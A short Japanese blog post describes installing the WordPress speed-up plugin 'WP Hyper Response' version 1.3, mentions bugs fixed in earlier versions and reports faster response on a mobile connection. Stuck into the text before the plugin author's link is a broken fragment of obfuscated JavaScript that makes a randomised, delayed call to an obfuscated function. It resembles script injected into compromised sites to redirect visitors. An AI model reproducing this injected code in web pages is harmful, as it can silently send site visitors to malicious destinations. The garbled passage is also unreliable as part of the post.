WordPressを高速化するプラグイン「WP Hyper Response」を導入してみた

WordPressを高速化するプラグインができたという記事をみてさっそく導入してみました。

サイト
Stocker.jp – diary
「WordPressを高速化するプラグインを作りました」
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://stocker.jp/diary/wp-hyper-response/
プラグイン名:WP Hyper Response

このプラグインはインストールするだけで設定項目はありません。

なお、2011/6/1の追記でバグフィックス版を公開したとありました。

バージョン1.3以前は
「WordPressの管理画面が真っ白になる」「リダイレクトエラーが出る」
といった不具合が報告されたために対応したとのこと。

私はバージョン1.3を導入して、細かい作業はしていませんがいい感じに動いているのを確認しました。

作者のコメントを読んでいると管理画面のレスポンスがかなりよくなるようです。
光回線ではあまり速度改善したかよくわかりませんが、モバイル回線(3Gの7.2MB)では確かにレスポンスがよくなりました。

まだ入れてすぐなので、どこまで安定動作するかわからないため、しばらく様子をみたいと思います。

コメントを残す